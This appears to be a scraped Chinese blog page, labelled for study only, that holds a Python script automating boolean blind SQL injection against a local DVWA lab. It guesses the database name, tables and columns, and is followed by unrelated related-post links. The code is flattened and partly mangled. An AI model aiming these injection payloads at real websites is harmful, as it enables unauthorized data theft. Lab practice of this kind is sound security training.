仅供学习代码参考

1#python dvwa布尔盲注自动化脚本

2 importrequests3 importstring4 importtime5 INIT_URL="http://127.0.0.1/DVWA-master/DVWA-master/vulnerabilities/sqli_blind/index.php?id="

6 token={"security":"low","PHPSESSID":"p7g937ga5glcvg8m5hv9o9a2ht"} #登录身份识别

7 COLUMN_NUM=11

8 COLUMN_LEN=15

9 dbLen=010 dbname=''

11 table_num=012 table=[]13 table_name='' #暂存用

14 column=[]15 column_name=''#暂存用

16 rightLen=017

18 time_start=time.time()19 url=INIT_URL+"1&Submit=Submit#"

20 rightLen=len(requests.get(url=url,cookies=token).text)21 print("正常返回文本长度:"+str(rightLen))22 #1.猜解数据库名长度 poc:" 1'and (select length(database()))="+str(dbLen)#"

23 whileTrue:24 dbLen +=1

25 dbUrl=INIT_URL+"1'and (select length(database()))="+str(dbLen)+"%23&Submit=Submit#"

26 print(dbUrl)27 if len(requests.get(url=dbUrl,cookies=token).text)==rightLen:28 print("数据库长度:"+str(dbLen))29 break

30 #2.猜解数据库名字 poc:" 1'and(select mid(database(),"+str(i)+",1)='"+j+"')=1#"

31 for i in range(1,dbLen+1):32 for j instring.ascii_lowercase:33 dbnameUrl=INIT_URL+"1'and(select mid(database(),"+str(i)+",1)='"+j+"')=1%23&Submit=Submit#"

34 print(dbnameUrl)35 if len(requests.get(url=dbnameUrl,cookies=token).text)==rightLen:36 dbname+=j37 break

38

39 print("数据库名字:"+dbname)40

41 #3.猜解数据库表数量 poc:" 1'and (select count(table_name) from information_schema.tables where table_schema='"+dbname+"')="+str(i)#"

42

43 for i in range(100):44 dbUrl=INIT_URL+"1'and (select count(table_name) from information_schema.tables where table_schema='"+dbname+"')="+str(i)+"%23&Submit=Submit#"

45 print(dbUrl)46 if len(requests.get(dbUrl,cookies=token).text)==rightLen:47 print("表数量"+str(i))48 table_num=i49 break

50

51 #4.猜解表名 poc:" 1'and (select ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1)))=103#

52

53 for i inrange(table_num):54 for k inrange(COLUMN_LEN):55 for j in range(48,123):56 dbUrl=INIT_URL+"1'and (select ascii(substr((select table_name from information_schema.tables where table_schema='"+dbname+"' limit"+str(i)+",1),"+str(k)+",1)))="+str(j)+"%23&Submit=Submit#"

57 print(dbUrl)58 if len(requests.get(dbUrl,cookies=token).text)==rightLen:59 table_name+=chr(j)60 print(table_name)61 break

62 table.append(table_name)63 table_name=''

64 print("表名:"+str(table))65

66

67

68 #5.猜解列名 poc :" 1'and (select ascii(substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1)))=i

69

70

71 for m inrange(table_num):72 for i inrange(COLUMN_NUM):73 for k inrange(COLUMN_LEN):74 for j in range(48,123):75 dbUrl=INIT_URL+"1'and (select ascii(substr((select column_name from information_schema.columns where table_schema='"+dbname+"'and table_name='"+table[m]+"' limit"+str(i)+",1),"+str(k)+",1)))="+str(j)+"%23&Submit=Submit#"

76 print(dbUrl)77 if len(requests.get(dbUrl,cookies=token).text)==rightLen:78 column_name+=chr(j)79 print(column_name)80 break

81 column_name+='/'

82 column.append(column_name)83 column_name=''

84 print("列名:"+str(column))85

86 time_end=time.time()87 print('用时:',time_end-time_start,'s')88 print("正常返回文本长度:"+str(rightLen))89 print("数据库长度:"+str(dbLen))90 print("数据库名字:"+dbname)91 print("表数量"+str(i))92 print("表名:"+str(table))93 print("列名:"+str(column))94 #6.拖库 poc: 1'and (select ascii(substr((select column[i] from dbname.table[j] limit 0,1),1,1)))=i

95 #具体列具体猜解,全部猜解时间太高

python脚本自动化盲注_python dvwa布尔盲注自动化脚本(level=low)相关推荐

  1. python定时运行py文件_Python使用windows设置定时执行脚本

    如果你写了一些Python程序,想要在特定的时间进行执行,例如你想让一段爬虫程序在每天的上午10点执行一次,那么我们就可以来使用windows自带的定时任务进行设置.由于Windows系统,无法使用L ...

  2. python脚本自动qq签到_python实现虾米音乐自动签到脚本

    初学python以及编程,尝试写这样一个脚本,待成功后才会继续完善. 现在想要实现登陆. 问题: 请问我这个代码哪儿出了问题?登陆不成功. headers和postData要写哪些出来,我用HttpF ...

  3. SQL注入之布尔盲注——sql-lab第八关

    布尔盲注简介 什么是盲注 盲注其实是sql注入的一种,之所以称为盲注是因为他不会根据你sql注入的攻击语句返回你想要知道的错误信息. [之前在做联合注入第一关的时候,用union select语句注入 ...

  4. SQL注入原理-布尔盲注

    小伙伴们大家好,今天为大家带来的使SQL注入原理之布尔盲注. 目录 布尔盲注使用的环境 常用函数与语句 substr()函数 ord()函数 length()函数 实战演示 1.判断是否存在注入点 2 ...

  5. SQL注入——布尔盲注,时间盲注,宽字节注入

    布尔盲注 1.布尔盲注利用前提 页面没有显示位,没有输出SQL语句执行错误信息,只能通过页面返回正常不正常来判断是否存在注入 缺点:速度太慢,消耗大量时间 布尔盲注思维导图: 布尔盲注常用语句: su ...

  6. 以dvwa为例学习简单sql布尔盲注的详细脚本

    0x01 前置知识 1.SQL注入与SQL盲注 SQL注入: 执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等 一般在页面上直接就会显示执行sql语句的结果 S ...

  7. python实现sql宽字节注入+布尔盲注

    目录 一.注意点 二.代码 三.使用 1.获取 (简单方法) (复杂方法) 2.使用 四.测试 一.注意点 本文代码是对着pikachu漏洞靶场的宽字节注入关卡开发的,代码中的payload和参数都基 ...

  8. 【SQL注入14】布尔盲注的半自动化实现(基于BurpSuite工具和sqli-labs-less8靶机平台)

    目录 1 概述 2 实验简介 2.1 实验平台 2.2 实验目标 3 实验过程 3.1 判断注入点及注入类型 3.2 爆库名(踩坑) 3.3 爆库名(成功) 3.4 爆表名 3.5 爆字段名 3.6 ...

  9. SQLi LABS Less-8 布尔盲注

    「作者主页」:士别三日wyx 「作者简介」:CSDN top200.阿里云博客专家.华为云享专家.网络安全领域优质创作者 第八关是单引号字符型注入,推荐使用布尔盲注 方式一:布尔盲注 第一步.判断注入 ...

最新文章

  1. 2021年速卖通828年中大促活动报名攻略
  2. Altium designer快捷键汇总
  3. loadrunner 场景设计-负载生成器管理
  4. react全局状态管理_react 状态管理的复杂度来源
  5. dispatch js实现_通信:派发与广播,on与emit,自行实现dispatch和broadcast方法
  6. dedecms 常用标签
  7. 图像欧拉数计算 matlab实现
  8. [poj1222]EXTENDED LIGHTS OUT(高斯消元)
  9. 七类***各有“黑招”
  10. 医学DICOM文件解析(笔记整理)
  11. Android 各国语言缩写及简称详细介绍
  12. opencore添加Linux引导,黑苹果OpenCore引导详细教程
  13. 使用NGUI实现拖拽功能(拼图小游戏)
  14. 墨哥视角,微软大八系,能大发么?(一)——surface
  15. EasyPlayer播放H.265的HLS视频流出现加载异常的问题分析及解决方法
  16. mysql数据库误删后能恢复吗_MySQL 数据库误删除后的数据恢复
  17. HDU 1422 重温世界杯 【C++练习题】
  18. mysql错误合集_mysql错误合集
  19. 元数据管理-技术元数据解决方案
  20. 股票打板 知识 收集

热门文章

  1. 《GB9706.1 医用电气设备 第1部分:安全通用要求》安规三项实验
  2. 抖音短视频SEO优化排名,抖音SEO搜索关键字排名
  3. 真正统治世界的十大算法(转)
  4. Nginx 端口转发实现!
  5. Android 文件夹放大缩小仿IOS融合动画效果
  6. 扫码器.java_条码扫描器在Java上的实现
  7. jQuery条形码插件 jQuery Barcode
  8. 【分布鲁棒】多源动态最优潮流的分布鲁棒优化方法
  9. 安装psacct或acct程序包
  10. 【课件制作软件】Focusky教程 | 关于FS字体的部分问题总汇以及解决办法